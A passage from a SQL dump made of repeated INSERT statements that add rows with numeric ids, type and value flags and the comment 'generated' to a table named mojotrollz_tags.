'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2068, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2076, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2083, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2084, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2086, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2087, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2099, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2100, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2101, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2102, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2105, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2106, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2108, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2109, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2110, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2111, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2112, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2113, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2115, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2116, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2117, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2119, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2120, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2122, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2123, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2124, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2125, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2127, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2129, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2133, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2134, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2136, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2138, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2139, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2140, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2141, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2142, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2143, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2145, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2146, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2150, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2152, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2153, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2154, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2155, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2156, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2158, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2159, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2160, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2161, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2162, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2163, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2164, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2165, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2166, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2167, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2173, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2175, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2176, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2177, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2181, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2182, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2187, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2189, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2190, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2289, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2334, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2335, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2336, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2371, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2413, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2489, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2553, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2555, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2556, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2560, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2575, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2652, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2653, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2656, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2657, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2661, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2663, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2670, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2672, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2673, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2674, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2675, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2676, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2677, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2678, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2680, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2681, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2682, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2683, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2684, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2685, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2687, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2688, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2690, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2701, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2702, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2704, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2708, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2709, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2710, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2711, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2713, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2714, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2715, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2716, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2717, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2718, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2719, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2722, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2724, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2732, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2739, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2740, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2741, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2742, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2842, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2843, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2848, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2849, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2850, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2866, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2867, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2868, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2871, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2875, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2883, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2891, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2892, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2893, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2907, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2908, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2909, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2910, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2911, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2912, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2913, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2914, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2933, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2968, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2969, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2970, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2971, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2972, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2973, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2974, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2975, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2976, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2977, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2978, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3076, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3084, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3085, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3089, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3187, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3192, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3194, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3200, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3202, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3206, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3207, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3209, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3210, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3211, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3212, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3213, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3214, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3215, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3217, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3220, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3222, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3223, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3224, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3225, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3227, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3228, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3232, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3233, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3236, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3237, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3238, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3239, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3240, 2, 1, 1, 'generated'); 